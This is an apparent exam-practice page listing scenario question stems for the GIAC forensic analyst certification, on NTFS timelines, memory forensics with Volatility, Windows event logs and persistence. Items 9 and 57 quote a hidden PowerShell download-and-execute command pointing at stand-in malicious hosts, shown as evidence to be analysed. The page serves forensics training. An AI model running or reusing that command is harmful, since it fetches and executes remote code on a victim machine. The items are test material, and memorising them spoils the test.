Courseiva

GCFA · domain

scenario questions

Practise GIAC Certified Forensic Analyst scenario questions practice questions — original exam-style scenarios with answer choices, explanations, and analysis of common mistakes.

292 questions57 easy147 medium88 hard

Focused practice

Practice scenario questions questions

Scored sessions drawing only from this domain — pick a length below.

Start 20-question practice test →

What this domain covers

What to know about scenario questions

scenario questions questions test whether you can apply the concept in context, not just recognise a definition.

How the topic appears in realistic exam-style scenarios.

Which detail in the question changes the correct answer.

How to eliminate plausible but wrong options.

How to connect the question back to the wider exam objective.

Watch out for

Common scenario questions exam traps

  • ▸Answering from memory before reading the full scenario.
  • ▸Missing a constraint such as cost, availability, security, scope or command context.
  • ▸Choosing a broad answer when the question asks for the most specific fix.
  • ▸Ignoring why the wrong options are tempting.

Question index

All scenario questions questions (292)

Click any question to see the full explanation, or start a practice session above.

1

An investigator is analyzing a Windows 10 system and needs to correlate file system timestamps with other artifacts to build a comprehensive timeline. Which two of the following Windows artifacts can provide additional temporal context when combined with NTFS timestamps? (Choose two.)

Hard
2

Which conclusion regarding this network logon event is most accurate based on the provided Windows Event Log details?

Medium
3

During an enterprise incident, your team identifies that an attacker has deployed a ransomware variant that encrypts files on a critical file server. The attacker also exfiltrated sensitive data before encryption. Which of the following best describes the appropriate containment strategy?

Medium
4

An analyst reviewing a Windows workstation finds that the file C:\Windows\System32\drivers\etc\hosts has been modified and now contains several entries mapping well-known banking domains to 127.0.0.1. The file's LastWriteTime is two days ago, and no administrator has reported making the change. Which conclusion is MOST appropriate?

Easy
5

Which memory artifact is most useful for reconstructing the command-line arguments used to execute a suspicious program?

Easy
6

Which of the following describes the 'MAC' in MACB times during timeline analysis?

Easy
7

A forensic analyst is building a timeline from an NTFS volume and wants to include the time when a file's metadata was last changed, such as permission modifications. Which timestamp should the analyst focus on to capture this event?

Easy
8

While reviewing a Windows host, you find a 4688 process creation event where the new process is C:\Windows\System32\svchost.exe but the parent process image is C:\Users\bob\AppData\Local\Temp\update.exe. The command line for svchost.exe contains -k netsvcs with no additional arguments. Which assessment is best supported?

Medium
9

A security analyst is examining a Windows 10 system and finds a scheduled task named 'Updater' that runs 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"' every hour. The task is configured to run under the SYSTEM account. Which of the following best describes the malicious technique being used?

Easy
10

Refer to the exhibit. An attacker attempts to use a compromised identity with this policy to modify a file in the 'sensitive-data' bucket. What is the expected outcome?

Medium
11

An analyst is reviewing a Windows 10 system and wants to determine the last time a user accessed a specific file. The analyst examines the file's NTFS standard information attributes and finds that the last access time is not updated. What is the most likely reason for this?

Easy
12

An analyst is examining an NTFS volume and notices a discrepancy where the $Standard_Information attribute modification time is earlier than the $File_Name attribute modification time. What does this specific pattern indicate about the file's history?

Medium
13

Which of the following best describes the function of the 'UserAssist' registry key in a Windows forensic investigation?

Medium
14

An analyst is investigating a Windows 10 system where an attacker allegedly used a remote access tool (RAT) that persists by modifying the Image File Execution Options (IFEO) registry key. The analyst wants to identify which executable was hijacked. Which registry location should the analyst examine to find the Debugger value that redirects execution?

Medium
15

Given the command-line exhibit, what is the best strategy to analyze the behavior of this process?

Medium
16

An analyst acquires a forensic image of a Windows 10 NTFS volume using a write blocker and now needs to build a file system timeline. The analyst wants to include the $STANDARD_INFORMATION timestamps but also wants to detect timestomping by comparing them with the $FILE_NAME timestamps. Which tool should the analyst use to extract both timestamp sets from the MFT and generate a bodyfile for timeline creation?

Easy
17

A forensic examiner is analyzing a memory image from a Windows 7 system that is suspected of being compromised by a sophisticated rootkit. The examiner runs the Volatility 2 plugin 'ssdt' and notices that several system service dispatch table (SSDT) entries point to addresses within a kernel module that is not signed by Microsoft and is not present in the loaded module list. Which of the following best describes the rootkit technique that is most likely in use?

Hard
18

An analyst is examining an NTFS volume and notices that a file's MFT entry shows a modification time earlier than its creation time. What is the most likely cause for this anomaly?

Medium
19

Which of the following describes the purpose of the 'Object Header' in Windows memory forensics?

Medium
20

An analyst is using The Sleuth Kit to analyze an NTFS image. They run `fls -r -m C:/` to generate a body file and then `mactime -b bodyfile -d` to produce a timeline. They notice that the timeline includes entries for files with a '$' prefix, such as $MFT, $LogFile, and $Bitmap. What is the most appropriate action for the analyst to take regarding these entries?

Easy
21

You are analyzing a Windows 10 memory dump for evidence of a kernel-mode rootkit that may have unlinked a malicious driver from the active module list. Which two Volatility 3 plugins would you use together to detect and enumerate such a hidden driver? (Choose two.)

Medium
22

A forensic analyst is examining an ext4 file system image from a Linux server. Using fls and istat from The Sleuth Kit, the analyst sees a deleted file whose inode still contains block pointers that now point to blocks reallocated to another file. The analyst wants to determine whether the deleted file's content can be recovered intact. Which ext4 condition best explains why the content is likely unrecoverable?

Medium
23

What is the primary function of the $LogFile in an NTFS file system?

Easy
24

A forensic analyst is examining a Windows 10 memory image to identify potential process injection. The analyst runs Volatility 3 plugins and focuses on the windows.malfind output. Which two of the following characteristics are most indicative of malicious code injection in a process's memory space? (Choose two.)

Medium
25

A forensic analyst is examining an NTFS volume and needs to identify which artifacts can provide evidence of file deletion or file system changes that occurred after a file was removed. Which TWO of the following NTFS artifacts are most directly useful for this purpose? (Choose two.)

Medium
26

An analyst is examining a Windows 10 workstation that is suspected of having a malicious service installed for persistence. The analyst wants to determine the original path of the service executable and the account it runs under. Which registry location should the analyst examine to find this information?

Medium
27

A forensic analyst is investigating a system where a user is suspected of using a tool to hide files by manipulating NTFS metadata. The analyst finds an MFT entry with a $FILE_NAME attribute that has a namespace value of 2 (POSIX) and a $STANDARD_INFORMATION attribute with timestamps that are inconsistent with the file's $UsnJrnl records. Which conclusion is most appropriate regarding the file's naming and timestamp artifacts?

Hard
28

Which THREE activities are considered best practices when preserving evidence from a cloud-based environment during an incident?

Hard
29

What is the consequence of a file name being stored in the $FILE_NAME attribute but not in the $INDEX_ROOT of its parent directory?

Medium
30

When investigating a suspected data exfiltration incident, which TWO sources are most useful for determining the volume and destination of the transferred data?

Medium
31

A forensic analyst is reviewing a Windows 10 workstation suspected of unauthorized data staging. While parsing the Master File Table with a commercial forensic suite, the analyst observes that a suspicious .zip file's $STANDARD_INFORMATION timestamps differ from its $FILE_NAME timestamps by more than six months, and the $FILE_NAME timestamps are older. Which conclusion is most consistent with this artifact pattern?

Medium
32

Which NTFS metadata attribute is responsible for storing Security Descriptors (ACLs)?

Medium
33

An investigator is analyzing an NTFS volume from a Windows Server 2016 system that was recently compromised. The attacker used a tool to modify file timestamps to evade detection. The investigator notices that the $STANDARD_INFORMATION timestamps for a suspicious executable are all set to 2018-01-01, while the $FILE_NAME timestamps remain at 2021-06-15. The $MFT entry number is 12345. What is the most accurate conclusion regarding the timestamp manipulation?

Hard
34

An incident responder acquires a memory image from a Windows Server 2016 system suspected of being compromised. The responder wants to identify network connections that were active at the time of capture, including the associated process names and ports. Which Volatility 3 plugin should the responder use to list active network connections from the memory image?

Medium
35

An investigator is analyzing a Windows 10 system where an attacker allegedly used a PowerShell script to download and execute a malicious payload. The investigator wants to determine the exact PowerShell commands that were executed. Which Windows artifact should the investigator examine to find this information?

Hard
36

An analyst is examining a file that was deleted. Why is the 'File Name' (FN) attribute in the MFT still potentially readable?

Medium
37

During an investigation of a compromised Windows 10 workstation, a forensic analyst reviews the NTFS $MFT and observes that the Standard Information Attribute (SIA) timestamps for a suspicious executable in C:\Windows\Temp are all identical, while the File Name Attribute (FNA) timestamps show a different, earlier date. The executable has no corresponding Prefetch file. Which conclusion is most strongly supported by these artifacts?

Medium
38

Refer to the exhibit. An investigator observes the listed network connections on a compromised server. Which process warrants immediate investigation based on these connections?

Medium
39

What does a non-resident $DATA attribute indicate in an NTFS MFT record?

Medium
40

During an investigation of a Windows Server 2019 host, you review the Security event log and find Event ID 4624 entries with Logon Type 3 originating from a workstation subnet that should never authenticate to this server. The associated 4672 entry shows SeDebugPrivilege assigned to the resulting token. The account name is a normal helpdesk user. Which conclusion is most defensible from these artifacts alone?

Medium
41

When reviewing firewall logs, what activity should be flagged as an immediate indicator of a potential port scan?

Easy
42

During an intrusion investigation on a Windows 10 workstation, an analyst observes that several user-mode processes have established TCP connections to 203.0.113.45:443. The analyst wants to determine which executable image on disk was responsible for the network activity and whether the process is still running. Which artifact provides the most direct evidence by mapping a live network connection to its owning process executable path?

Medium
43

An investigator is examining a Windows 10 workstation's NTFS volume with Sleuth Kit tools. They run fls against the volume and observe that a deleted file's MFT entry still shows a valid $FILE_NAME attribute referencing the parent directory, but the $DATA attribute's resident content is now zero-filled. Which interpretation of this artifact is MOST accurate for the timeline?

Medium
44

Which NTFS attribute would an investigator primarily examine to determine the parent directory of a specific file?

Easy
45

When examining a memory image, why is it necessary to ensure that the profile used for the memory analysis tool matches the target operating system's specific build?

Medium
46

An attacker is using a living-off-the-land (LotL) technique to execute commands on a Linux server. Which log source is most likely to reveal the command-line arguments used?

Medium
47

Which TWO of the following behaviors are common indicators of fileless malware execution that a forensic analyst should look for in memory artifacts?

Medium
48

In the context of memory forensics, what does the term 'Page File' represent in a crash dump?

Hard
49

When performing timeline analysis on a Linux system, which file is the most critical to examine to reconstruct user login and logout history?

Medium
50

During a compromise investigation, an analyst reviews Windows Event Logs and observes that Security Event ID 4688 entries are present, but the Process Command Line field is empty for all of them. The system is running Windows 10 Enterprise. What is the most likely reason for the missing command line data?

Medium
51

A forensic analyst is analyzing a Windows 10 memory image and finds a process named 'svchost.exe' with PID 4567. The process's parent is 'services.exe', but its executable path is C:\Users\Public\svchost.exe. The analyst also notices that the process has a network connection to an external IP on port 443. Which of the following is the most likely explanation for this finding?

Hard
52

During a live response on a Windows 10 workstation, you observe a process named 'lsass.exe' with PID 672. Its parent process is 'winlogon.exe' (PID 596), and its executable path is 'C:\Windows\System32\lsass.exe'. However, the process has an open handle to a suspicious named pipe '\\.\pipe\evil'. Based on this evidence, what is the most likely explanation?

Medium
53

During a live response on a Windows 10 workstation suspected of lateral movement, you capture volatile memory and also export the Windows Event Logs. You need to correlate a process that was running at the time of capture with its parent process and the user account that launched it, using only the memory image. Which Volatility 3 plugin should you run to produce a parent-child process tree with PID/PPID, image name, and offset columns?

Medium
54

A forensic analyst is examining a Linux ext4 file system and wants to determine when a file's metadata (such as permissions or ownership) was last changed. Which timestamp should they examine?

Easy
55

Why is it important to include non-security personnel, such as legal counsel and HR, in the incident response process for a significant data breach?

Medium
56

An incident responder is investigating a compromised Windows system and finds that the attacker used a technique known as 'process hollowing' to hide malicious code. Which of the following best describes how process hollowing works?

Hard
57

An incident responder is analyzing a compromised Windows server and suspects that an attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with a trigger set to run every hour. The task's action is 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/script.ps1')"'. Which of the following best describes the attacker's technique?

Hard
58

An enterprise incident responder is analyzing a compromised Windows 10 workstation. The attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with the action 'C:\Windows\Temp\svchost.exe'. However, the file svchost.exe is not present in that directory. Which of the following best explains why the task still appears and what should the responder do next?

Hard
59

An analyst is reviewing an NTFS file system timeline and notices that a file's $STANDARD_INFORMATION modified timestamp is 2024-01-15 10:00:00, while its $FILE_NAME modified timestamp is 2024-01-15 09:55:00. The file's $MFT record shows a USN journal entry indicating a rename operation at 09:54:00. There is no other metadata. Which of the following is the most likely explanation for the 5-minute difference between the two modified timestamps?

Hard
60

An investigator notices that a file's 'Birth' time is later than its 'Modification' time. What is the most likely forensic explanation for this phenomenon?

Medium
61

An analyst is reviewing a memory image from a Windows server and needs to identify kernel drivers that were loaded but are not present in the list of modules on disk. The analyst runs the Volatility 3 windows.modules plugin and compares the output to a baseline of known-good drivers. Which additional plugin should the analyst run to detect drivers that have been unlinked from the kernel module list but whose code may still be resident in memory?

Medium
62

A forensic analyst is reviewing a compromised Windows 10 host and finds a file named 'lsass.exe' in the C:\Windows\Temp directory. The file has a creation timestamp that coincides with the suspected intrusion time. The analyst wants to determine if this file is a malicious copy of the legitimate Windows process. Which characteristic of the legitimate lsass.exe should the analyst verify first to confirm the file is suspicious?

Easy
63

An examiner is reviewing an APFS volume from a macOS 13 system. Using a timeline tool that parses APFS metadata, the analyst observes a file whose inode has an added date (birth time) earlier than its modified time, and the file's data stream shows a sparse extent. The case requires establishing the earliest credible creation time for the file. Which APFS attribute should the analyst rely on as the file's creation time?

Hard
64

An examiner captures a memory image from a live system while a malicious process is active. Upon analysis using Volatility, the examiner notes that the process environment block (PEB) displays a different path for the executable than the one found in the VAD tree. Which artifact is likely being manipulated?

Medium
65

A digital forensics examiner is analyzing a memory dump from a Windows 7 system using Volatility 3. The examiner wants to identify all network connections that were active at the time of the capture, including the process responsible for each connection. Which Volatility 3 plugin should the examiner use to achieve this goal?

Easy
66

An examiner is analyzing a Windows memory image and wants to determine whether a specific kernel driver was loaded and then unloaded during the system's uptime. Which approach is most appropriate?

Hard
67

An investigator is examining an NTFS volume from a system that was abruptly powered off during a malware installation. The analyst observes that the MFT contains a file record for a suspicious executable with a valid $DATA attribute, but the file is not visible in the directory index. Which NTFS artifact should the analyst examine to determine whether the file record was orphaned due to an interrupted transaction?

Hard
68

During a forensic investigation of a Windows 10 workstation, an analyst reviews the NTFS Master File Table (MFT) and notices that the $STANDARD_INFORMATION timestamps for a suspicious file are all dated 2023-08-15, but the $FILE_NAME timestamps are dated 2024-01-20. The file is located in C:\Users\Public\Downloads. Which of the following best explains this discrepancy?

Medium
69

An analyst is examining a Windows 10 system and finds a suspicious file in the Recycle Bin. The analyst wants to determine the original path of the file before it was deleted. Which artifact should the analyst examine to find the original file path and deletion time?

Medium
70

You are examining a Windows 10 host and find a scheduled task whose XML action launches 'rundll32.exe' with the argument 'C:\ProgramData\Microsoft\Crypto\RSA\logon.dll,Register'. The task's author is a domain user who has never logged on to this machine, and the DLL has a creation timestamp matching the suspected intrusion window. Which assessment is best supported?

Hard
71

An enterprise incident response team is preparing to conduct a forensic investigation on a compromised Linux server. The server is still running and cannot be taken offline. Which TWO of the following commands are appropriate for collecting volatile network connection information while minimizing disruption to the system? (Choose two.)

Medium
72

Which NTFS metadata file serves as the index for all files and directories on the volume?

Easy
73

Which indicator is most effective for identifying a 'Golden Ticket' attack during Kerberos-based authentication?

Medium
74

During an enterprise incident, you discover that an attacker modified the Windows event log service to record only selected events, effectively hiding malicious activity. Which Windows artifact should you analyze first to determine what modifications were made to the logging configuration?

Medium
75

A Windows 10 endpoint was compromised, and the attacker cleared the Security event log after establishing persistence. You have a memory image captured after the clearing. Which Windows Event Log artifact can still provide evidence of the log-clearing action, even if the Security log entries were wiped?

Easy
76

An examiner is reviewing a Windows memory image for evidence of process hollowing. Which two artifacts, when observed together, most strongly support that a process has been hollowed? (Choose two.)

Hard
77

A forensic analyst is examining a Windows Server 2016 memory image for evidence of a kernel-mode rootkit. The analyst runs the Volatility 3 windows.psscan plugin and observes a process named 'svchost.exe' with PID 1337 that does not appear in the windows.pslist output. Further inspection shows that the process has no corresponding entry in the active process list but has a valid EPROCESS structure in pool memory. What is the most likely explanation for this discrepancy?

Medium
78

An analyst is reviewing a Windows 10 workstation that is suspected of being compromised by a fileless malware. The analyst has a memory image and wants to identify processes that have a thread start address pointing outside of any legitimate module. Which Volatility 3 plugin is most appropriate for this task?

Medium
79

An analyst is examining a Windows 10 system to determine if a specific USB device was connected. The analyst has already checked the registry and found no trace in USBSTOR. Which TWO additional artifacts should the analyst examine to corroborate USB device connection? (Choose two.)

Medium
80

What is the primary purpose of the $LogFile in NTFS?

Medium
81

When analyzing a memory dump, what is the primary purpose of identifying the 'KPCR' (Kernel Processor Control Region)?

Medium
82

An analyst is examining a Windows system and needs to determine when a USB mass storage device was last connected. Which registry artifact should be examined to find the device's first and last connection times?

Easy
83

Which NTFS master file table (MFT) record contains metadata about the MFT itself?

Easy
84

When analyzing the 'TypedPaths' registry key, what type of user activity is being reviewed?

Medium
85

An organization discovers that an attacker is using 'Living off the Land' (LotL) binaries to execute malicious code. Why are LotL attacks particularly difficult to detect in an enterprise environment?

Hard
86

Why might an analyst prefer using 'Super-Timeline' creation tools, such as log2timeline, over manual collection of file system timestamps?

Medium
87

A forensic analyst is creating a timeline from a Windows 10 workstation using fls and mactime from The Sleuth Kit. The analyst notices that the bodyfile contains entries with timestamps that appear to be off by several hours compared to the wall-clock time the incident was reported. The system is known to be set to UTC in the BIOS. Which action best ensures the timeline is correctly aligned for reporting?

Medium
88

During a forensic investigation of a Windows 10 system, an analyst observes that a file's $STANDARD_INFORMATION creation timestamp is 2020-01-01 10:00:00, while its $FILE_NAME creation timestamp is 2020-01-01 10:00:05. The system time zone is UTC-5. The analyst also notes that the file's $STANDARD_INFORMATION modification timestamp is 2020-01-01 10:00:00. What is the most likely explanation for the 5-second difference between the creation timestamps?

Hard
89

During a forensic examination of an NTFS volume, an analyst notices that a file's $STANDARD_INFORMATION timestamps show a modification time of 2023-04-01 10:00:00, but the $FILE_NAME timestamps show a modification time of 2023-03-15 14:30:00. The file is not a system file and has not been renamed. What is the most likely explanation for this discrepancy?

Medium
90

During an investigation of a compromised Windows Server 2019, an analyst extracts the ShimCache (AppCompatCache) from the SYSTEM registry hive. The analyst needs to determine which executable was present on the system but may have been deleted. Which artifact within the ShimCache entry provides the best indication of file existence and last modification time?

Hard
91

An examiner is analyzing an NTFS volume from a Windows Server 2016 system that was abruptly powered off during a security incident. The examiner wants to determine recent file system changes that may not have been flushed to the $MFT. Which two NTFS artifacts should the examiner prioritize to reconstruct recent metadata operations? (Choose two.)

Hard
92

An investigator is preparing to analyze a Windows 10 workstation's NTFS volume using a forensic tool that reads the master file table (MFT) directly. The goal is to build a timeline that includes timestamps for files that were deleted before the acquisition. Which artifact should the investigator primarily rely on to recover timestamps for deleted files?

Easy
93

An analyst is examining a Linux server that is suspected of being compromised. The analyst runs 'netstat -anp' and observes a process named 'kworker' with PID 1234 listening on TCP port 4444. The analyst knows that legitimate kworker processes are kernel threads and do not open network sockets. Which of the following conclusions is most appropriate?

Medium
94

An analyst is examining a Linux server suspected of compromise. In /var/log/auth.log, they observe repeated entries of the form: 'sshd[1234]: Accepted publickey for deploy from 10.20.30.40 port 51515 ssh2: RSA SHA256:...' followed by 'sshd[1234]: pam_unix(sshd:session): session opened for user deploy'. No corresponding 'Failed password' entries appear for that source IP. Which interpretation is MOST accurate?

Medium
95

Which artifact is the primary location for finding 'Shellbag' data, which tracks user folder access history?

Easy
96

A forensic analyst is building a file system timeline from an NTFS volume and wants to ensure it includes reliable evidence of file creation and deletion events. Which two artifacts should the analyst prioritize to capture these events? (Choose two.)

Medium
97

A workstation shows signs of an attacker establishing persistence. You want to identify a scheduled task that runs a suspicious binary at user logon. Which Windows artifact should you examine to find the task's action and trigger configuration?

Medium
98

During a timeline review of an NTFS volume, an analyst observes that a file's $STANDARD_INFORMATION modification time is several days earlier than its $FILE_NAME modification time, and the $STANDARD_INFORMATION creation time is also earlier than the $FILE_NAME creation time. The file is a suspected malware dropper. Which conclusion is best supported by this pattern?

Hard
99

An analyst is examining an NTFS volume from a Windows Server 2019 system that was used as a file server. A file critical to the investigation is missing from the directory listing, but the analyst suspects the file was recently deleted and its MFT entry has not been overwritten. Which NTFS artifact should the analyst examine to recover the file's full path and name if the MFT entry is still intact?

Hard
100

An analyst is investigating a Windows 10 system and discovers that a user's NTUSER.DAT registry hive contains a key named 'RecentDocs' with numerous entries. What is the primary forensic significance of this artifact?

Hard
101

During a forensic examination of a Windows 10 workstation, an analyst needs to determine which user account was interactively logged on at a specific date and time. The system is powered off and only the disk image is available. Which artifact should the analyst examine to find the most reliable record of interactive logon sessions, including logon type and timestamp?

Medium
102

An analyst observes PowerShell usage with the encoded command flag '-e'. What is the standard forensic approach to de-obfuscate and analyze this activity?

Medium
103

While triaging a Linux web server, you find that '/usr/bin/sshd' was executed but the running process's parent is 'bash' rather than the systemd service manager, and the process has no associated listening socket. Which conclusion is best supported?

Easy
104

During an incident response engagement, you discover that an attacker has compromised a Windows server and established persistence by creating a new Windows service. The service is configured to run a malicious executable at system startup. Which of the following registry locations would you examine to find the configuration of this service?

Hard
105

Which forensic artifact is most useful for determining if a user has recently opened a specific suspicious file, even if that file has since been deleted?

Medium
106

An analyst is reviewing a Windows 10 memory image captured from a workstation suspected of malware infection. While examining a process, the analyst notices that the process's page directory base (DTB) points to a valid address, but the process's image path on disk cannot be found. Which Volatility 3 plugin should the analyst use to determine if the process memory contains injected code?

Medium
107

You are reviewing a Windows 10 host for evidence of process execution. A suspect binary was deleted from disk, but you need to prove it actually ran. Which artifact provides the strongest evidence that the specific executable was launched, independent of any prefetch or shimcache entries?

Hard
108

Which THREE of the following are considered 'living-off-the-land' (LotL) techniques used by attackers to avoid detection?

Hard
109

A forensic analyst is examining a Windows 10 system and wants to determine which USB storage devices have been connected to the machine. The analyst has access to the registry. Which registry key should the analyst examine to find a list of USB devices that have been connected, including vendor and product IDs?

Easy
110

Which artifact is the most reliable for determining if an external USB mass storage device was mounted on a system, even if the device is no longer present?

Medium
111

A forensic analyst is investigating a Windows workstation that is suspected of being compromised by a fileless malware attack. The analyst has acquired a memory image and a disk image. Which TWO of the following artifacts, when analyzed together, would provide the strongest evidence that a fileless attack has occurred and is currently active? (Choose two.)

Hard
112

When analyzing the $LogFile in NTFS, what is the significance of the undo and redo operations recorded in the transaction logs for timeline reconstruction?

Hard
113

A GCFA analyst is examining a Windows 10 memory image and wants to identify processes that were running when the image was captured, including those that may have terminated but left residual structures. The analyst uses Volatility 3. Which two plugins should the analyst use to enumerate processes from different sources? (Choose two.)

Medium
114

An analyst is examining a memory capture to identify malicious code injection. Which volatility plugin would best help determine if a process has been hollowed by inspecting the base address and the VAD (Virtual Address Descriptor) properties of the memory segments?

Medium
115

An analyst reviewing Windows event logs on a compromised workstation discovers a sudden spike in Event ID 4624 with Logon Type 3, followed immediately by Event ID 4672. The source IP address belongs to a non-routable internal subnet. Which forensic interpretation best explains this activity?

Medium
116

During a compromise assessment on a Windows 10 workstation, an analyst runs a volatile memory capture and inspects the process list in Volatility 3. The analyst observes a process named 'lsass.exe' with PID 872, whose parent process is 'winlogon.exe' with PID 640. The executable path recorded for lsass.exe is 'C:\Windows\System32\lsass.exe'. Which conclusion is BEST supported by these artifacts?

Medium
117

What is the primary function of the $ATTRIBUTE_LIST attribute in an MFT entry?

Hard
118

During a memory forensics investigation, an analyst observes a process with a parent process ID (PPID) that does not correspond to any active process in the windows.pslist output. The analyst suspects process injection or process hollowing. Which Volatility 3 plugin should the analyst use to identify processes that may be hidden from the active process list by comparing the linked list to a pool tag scan?

Medium
119

You are reviewing a Windows Server 2019 Security event log and find Event ID 4624 with Logon Type 3 and the 'NTLM' authentication package for a service account, occurring at 02:14 from a workstation that has no corresponding 4648 or 4672 events. Which interpretation is most forensically sound?

Hard
120

A forensic analyst is examining a memory dump from a Windows Server 2016 system that is suspected of being compromised by a kernel-mode rootkit. The analyst wants to identify hidden processes that are not visible through standard process enumeration. Which two Volatility 3 plugins should the analyst use to detect hidden processes by comparing different process listing methods? (Choose two.)

Hard
121

During a response to an incident involving a web shell, you find that the attacker is using custom encoding to bypass WAF signatures. What is the best forensic approach to identify all impacted web files?

Hard
122

During an enterprise incident response, you are tasked with collecting volatile evidence from a compromised Windows workstation. Which two of the following are considered best practices for preserving volatile data? (Choose two.)

Medium
123

An examiner suspects that a system has been compromised with a rootkit that hooks kernel functions. Which memory forensics technique is most appropriate to detect this?

Medium
124

An analyst is examining a Windows 10 system and wants to determine the last time a specific user logged on interactively. Which Windows Event Log should be examined to find the most recent interactive logon event?

Easy
125

An investigator is analyzing ext4 file system timelines extracted via fls and mactime. They notice that an inode's ctime was updated recently, but the atime and mtime remained unchanged. What does this specific combination of inode timestamp changes typically indicate in a Linux environment?

Medium
126

In memory forensics, what is the role of the 'VAD' (Virtual Address Descriptor) tree?

Easy
127

An analyst discovers a suspicious executable in the C:\Users\Public folder. To determine if the file was executed, the analyst examines the Shimcache. Which behavior is characteristic of the Shimcache artifact?

Medium
128

An organization is deploying an EDR solution to improve incident response capabilities. What is the most critical factor to consider when configuring EDR policies for a production environment?

Medium
129

A forensic analyst is examining a memory dump from a Windows Server 2016 system that is suspected of being compromised by a kernel-mode rootkit. The analyst runs Volatility 3 and observes several anomalies. Which two of the following artifacts are most indicative of a kernel-mode rootkit that uses SSDT hooking? (Choose two.)

Hard
130

During memory analysis of a Windows host, an examiner runs windows.netscan and observes several established TCP connections originating from a process that no longer appears in the process list. Which conclusion is most appropriate?

Medium
131

An organization detects a sophisticated adversary attempting to move laterally using Pass-the-Hash (PtH) techniques. Which THREE of the following configurations or practices are most effective at mitigating this risk?

Hard
132

Based on the process metadata provided in the exhibit, what is the most significant indicator that requires further investigation?

Medium
133

An analyst suspects that an attacker used WMI (Windows Management Instrumentation) to execute code remotely. Which log file should be examined to confirm WMI-based process creation?

Medium
134

You are analyzing an NTFS volume and need to determine the original path and name of a file that has been moved to a different directory. The file's MFT entry contains multiple $FILE_NAME attributes. Which two of the following statements about $FILE_NAME attributes are correct? (Choose two.)

Hard
135

An analyst is investigating a Windows 10 system for evidence of lateral movement. The analyst suspects that an attacker used PsExec to remotely execute commands on the system. Which TWO artifacts should the analyst examine to corroborate this activity? (Choose two.)

Medium
136

An organization is deploying an EDR solution across a hybrid environment. Which TWO of the following tasks are critical for ensuring effective incident response visibility?

Hard
137

An analyst is investigating a suspected malware infection on a Windows Server 2016 system. The analyst reviews the Security event log and finds multiple Event ID 4688 entries for a process named 'svchost.exe' with a command line containing ' -k netsvcs -p -s Schedule'. The analyst wants to determine whether this is a legitimate service host process or a masquerading attempt. Which artifact should the analyst examine next to verify the integrity and origin of the executable?

Medium
138

A forensic analyst is examining a Windows Server 2016 system that is suspected of being compromised. The analyst runs 'wevtutil qe Security /f:text /q:"*[System[(EventID=4688)]]"' and notices that many process creation events have the 'Subject Logon ID' field set to '0x3e7'. Which of the following best describes the significance of this finding?

Hard
139

A forensic analyst is examining a Windows 10 system and finds a prefetch file named `CMD.EXE-1234ABCD.pf`. The analyst wants to determine the last time the program was executed. Which timestamp in the prefetch file should the analyst use?

Easy
140

What is the significance of the $LogFile in NTFS when performing an investigation on a system that experienced a sudden power loss?

Medium
141

Which registry hive contains the 'UserAssist' key, and what is its primary forensic value?

Medium
142

During an enterprise incident response, you are examining a compromised Windows system and suspect the attacker used a rootkit to hide a malicious service. You have obtained a memory image and a disk image. Which of the following techniques is most effective for detecting a hidden service that is not visible through standard API calls?

Hard
143

What is the primary function of the $LogFile in NTFS when reconstructing a timeline?

Medium
144

An incident responder is reviewing EDR alerts and discovers an 'Account Manipulation' event. What is the most common reason why an attacker would target the 'Domain Admins' group during the post-exploitation phase?

Medium
145

During an enterprise-wide incident response, a Windows workstation is suspected of being compromised by a threat actor who used a spear-phishing document. The machine is still powered on and the user is logged in. You need to capture volatile evidence in a forensically sound manner. Which of the following is the correct order of volatility for collecting evidence, from most volatile to least volatile?

Medium
146

An analyst identifies a process performing unexpected DNS queries to a top-level domain ending in .xyz every 60 seconds. What is the most effective initial host-based action to confirm malicious beaconing?

Medium
147

A forensic analyst captures a memory image from a Windows 10 workstation using a hardware acquisition tool. The analyst then wants to enumerate the loaded kernel modules to compare against a known-good baseline. Which Volatility 3 plugin should the analyst run to list the loaded kernel modules from the memory image?

Easy
148

What is the primary role of the $MFTMirr file in NTFS?

Easy
149

During a cloud-based incident, you determine that an attacker has gained access to an IAM role with excessive permissions. What is the most effective containment step to minimize the blast radius without causing immediate service outages?

Medium
150

You have acquired a memory image from a Windows Server 2019 system using WinPmem. You need to determine the operating system version and service pack level to ensure you use the correct Volatility profile or symbol table. Which Volatility 3 plugin provides this information directly from the memory image?

Easy
151

An analyst is examining a Windows 10 system where a user deleted several files containing sensitive data. The analyst needs to recover the file content and determines that the $DATA attribute of the MFT record for one deleted file is resident. What does this indicate about the file's data and its recoverability?

Medium
152

Which of these is the primary limitation of using a file system 'Birth' time as a definitive event marker?

Medium
153

Which phase of the incident response lifecycle is most directly responsible for ensuring that an enterprise environment is returned to a secure, verified state after an intrusion?

Medium
154

During a live response on a Windows 10 workstation suspected of malware infection, an examiner captures a full physical memory image using WinPmem. The examiner later wants to determine whether the captured image contains enough context to reconstruct which user account was interactively logged on at the time of acquisition. Which memory structure would the examiner primarily parse to identify the active interactive session and its associated user?

Easy
155

An analyst is investigating a Windows 10 system and finds a suspicious shortcut file in a user's Recent folder. The analyst wants to determine the full path of the target file and any command-line arguments used when the shortcut was created. Which artifact should the analyst examine?

Medium
156

Which Volatility plugin would be most effective for extracting the command-line arguments of a process to identify malicious flags used during execution?

Medium
157

During an investigation, you recover a deleted file from an NTFS volume. The MFT entry for the file shows that the $DATA attribute is non-resident, and the data runs are still intact. However, the $BITMAP attribute of the MFT indicates that the MFT entry is marked as unallocated. What is the most accurate conclusion about the recoverability of the file's content?

Hard
158

An incident responder is investigating a compromised Windows server. The attacker gained access via a Remote Desktop Protocol (RDP) brute-force attack and then created a new local user account for persistence. The responder needs to identify evidence of the newly created account and any subsequent logon activity. Which TWO of the following Windows artifacts should the responder examine to find this evidence? (Choose two.)

Medium
159

Refer to the exhibit. An analyst observes this process execution on a domain controller. What indicator suggests this activity is likely malicious?

Hard
160

When analyzing memory for evidence of code injection, which THREE of the following memory regions or indicators are most significant to investigate?

Hard
161

An analyst is examining an NTFS volume and wants to identify the MFT entry for a specific file named 'report.docx'. The analyst knows the file's path but needs to locate its MFT record number to examine its attributes. Which NTFS metadata file should the analyst consult to map the file path to its MFT record number?

Easy
162

